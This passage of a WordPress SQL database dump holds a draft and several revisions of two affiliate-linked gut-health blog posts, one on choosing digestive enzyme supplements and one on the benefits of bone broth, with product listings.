NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n\n\n\n

It\'s crucial to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some individuals, they may not be necessary or suitable for everyone. Additionally, relying on supplements should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n','Choosing the Right Enzyme Supplements: A 2023 Quick Guide & Recommendations','','draft','open','open','','','','','2023-10-10 12:38:09','2023-10-10 12:38:09','',0,'https://tummyrevolution.com/?p=5694',0,'post','',0),(5695,1,'2023-10-10 09:23:29','2023-10-10 09:23:29','\n


Choosing the best enzymes for your specific needs involves considering several factors. Here\'s a guide to help you make an informed decision:
Skip to top 5 digestive enzyme list here

\n\n\n\n
    \n
  1. Identify Your Needs:\n
      \n
    • Determine the purpose for taking enzyme supplements.
    • \n
    \n
  2. \n\n\n\n
  3. Enzyme Types:\n
      \n
    • Choose enzymes (proteases, lipases, amylases, etc.) that align with your specific needs.
    • \n
    \n
  4. \n\n\n\n
  5. Consider Your Diet:\n
      \n
    • Ensure the supplement is suitable for your dietary restrictions.
    • \n
    \n
  6. \n\n\n\n
  7. Dosage and Potency:\n
      \n
    • Consider the appropriate dosage based on individual needs.
    • \n
    \n
  8. \n\n\n\n
  9. Formulas:\n
      \n
    • Decide between broad-spectrum and targeted enzyme supplements.
    • \n
    \n
  10. \n\n\n\n
  11. Quality and Purity:\n
      \n
    • Choose reputable brands with third-party testing and certifications.
    • \n
    \n
  12. \n\n\n\n
  13. Check for Additives:\n
      \n
    • Review the ingredient list for additives, fillers, or allergens.
    • \n
    \n
  14. \n\n\n\n
  15. Probiotics/Prebiotics:\n
      \n
    • Consider supplements with added probiotics or prebiotics for gut health.
    • \n
    \n
  16. \n\n\n\n
  17. Consult a Professional:\n
      \n
    • Seek advice from a healthcare professional, especially with pre-existing health conditions.
    • \n
    \n
  18. \n\n\n\n
  19. Read Reviews:\n
      \n
    • Consider user reviews for insights into effectiveness.
    • \n
    \n
  20. \n\n\n\n
  21. Trial and Observation:\n
      \n
    • Start with a lower dosage, observe your body\'s response, and adjust as needed.
    • \n
    \n
  22. \n
\n\n\n\n

Top 5 rated and recommended enzyme supplements

\n\n\n\n

Here are some Digestive Enzymes that have great reviews and are well tested.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links.

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n\n\n\n

It\'s crucial to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some individuals, they may not be necessary or suitable for everyone. Additionally, relying on supplements should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n','Choosing the Right Enzyme Supplements: A 2023 Quick Guide & Recommendations','','inherit','closed','closed','','5694-revision-v1','','','2023-10-10 09:23:29','2023-10-10 09:23:29','',5694,'https://tummyrevolution.com/?p=5695',0,'revision','',0); INSERT INTO `wpvt_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (5696,1,'2023-10-10 09:24:42','2023-10-10 09:24:42','\n


Choosing the best enzymes for your specific needs involves considering several factors. Here\'s a guide to help you make an informed decision:
Skip to top 5 digestive enzyme list here

\n\n\n\n
    \n
  1. Identify Your Needs:\n
      \n
    • Determine the purpose for taking enzyme supplements.
    • \n
    \n
  2. \n\n\n\n
  3. Enzyme Types:\n
      \n
    • Choose enzymes (proteases, lipases, amylases, etc.) that align with your specific needs.
    • \n
    \n
  4. \n\n\n\n
  5. Consider Your Diet:\n
      \n
    • Ensure the supplement is suitable for your dietary restrictions.
    • \n
    \n
  6. \n\n\n\n
  7. Dosage and Potency:\n
      \n
    • Consider the appropriate dosage based on individual needs.
    • \n
    \n
  8. \n\n\n\n
  9. Formulas:\n
      \n
    • Decide between broad-spectrum and targeted enzyme supplements.
    • \n
    \n
  10. \n\n\n\n
  11. Quality and Purity:\n
      \n
    • Choose reputable brands with third-party testing and certifications.
    • \n
    \n
  12. \n\n\n\n
  13. Check for Additives:\n
      \n
    • Review the ingredient list for additives, fillers, or allergens.
    • \n
    \n
  14. \n\n\n\n
  15. Probiotics/Prebiotics:\n
      \n
    • Consider supplements with added probiotics or prebiotics for gut health.
    • \n
    \n
  16. \n\n\n\n
  17. Consult a Professional:\n
      \n
    • Seek advice from a healthcare professional, especially with pre-existing health conditions.
    • \n
    \n
  18. \n\n\n\n
  19. Read Reviews:\n
      \n
    • Consider user reviews for insights into effectiveness.
    • \n
    \n
  20. \n\n\n\n
  21. Trial and Observation:\n
      \n
    • Start with a lower dosage, observe your body\'s response, and adjust as needed.
    • \n
    \n
  22. \n
\n\n\n\n

Top 5 rated and recommended enzyme supplements

\n\n\n\n

Here are some Digestive Enzymes that have great reviews and are well tested.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links.

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n\n\n\n

It\'s crucial to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some individuals, they may not be necessary or suitable for everyone. Additionally, relying on supplements should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n','Choosing the Right Enzyme Supplements: A 2023 Quick Guide & Recommendations','','inherit','closed','closed','','5694-revision-v1','','','2023-10-10 09:24:42','2023-10-10 09:24:42','',5694,'https://tummyrevolution.com/?p=5696',0,'revision','',0),(5697,1,'2023-10-10 09:32:59','2023-10-10 09:32:59','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Recipe to Chicken and Beef Bone Broth

\n\n\n\n

Here is a list of ready made Bone Broth you can purchase.

\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 09:32:59','2023-10-10 09:32:59','',5464,'https://tummyrevolution.com/?p=5697',0,'revision','',0),(5698,1,'2023-10-10 10:00:25','2023-10-10 10:00:25','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Recipe to Chicken and Beef Bone Broth

\n\n\n\n

Below you\'ll find a list of some great Bone Broths you can buy online:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 10:00:25','2023-10-10 10:00:25','',5464,'https://tummyrevolution.com/?p=5698',0,'revision','',0),(5699,1,'2023-10-10 10:06:03','2023-10-10 10:06:03','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Recipe to Chicken and Beef Bone Broth

\n\n\n\n

Below you\'ll find a list of some great Bone Broths you can buy online:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 10:06:03','2023-10-10 10:06:03','',5464,'https://tummyrevolution.com/?p=5699',0,'revision','',0),(5700,1,'2023-10-10 10:10:51','2023-10-10 10:10:51','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Recipe to Chicken and Beef Bone Broth

\n\n\n\n

Below you\'ll find a list of some great Bone Broths you can buy online:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 10:10:51','2023-10-10 10:10:51','',5464,'https://tummyrevolution.com/?p=5700',0,'revision','',0),(5701,1,'2023-10-10 10:13:13','2023-10-10 10:13:13','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR find a list of some great Bone Broths you can buy online below:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 10:13:13','2023-10-10 10:13:13','',5464,'https://tummyrevolution.com/?p=5701',0,'revision','',0),(5702,1,'2023-10-10 10:16:39','2023-10-10 10:16:39','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR find a list of some great Bone Broths you can buy online below:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

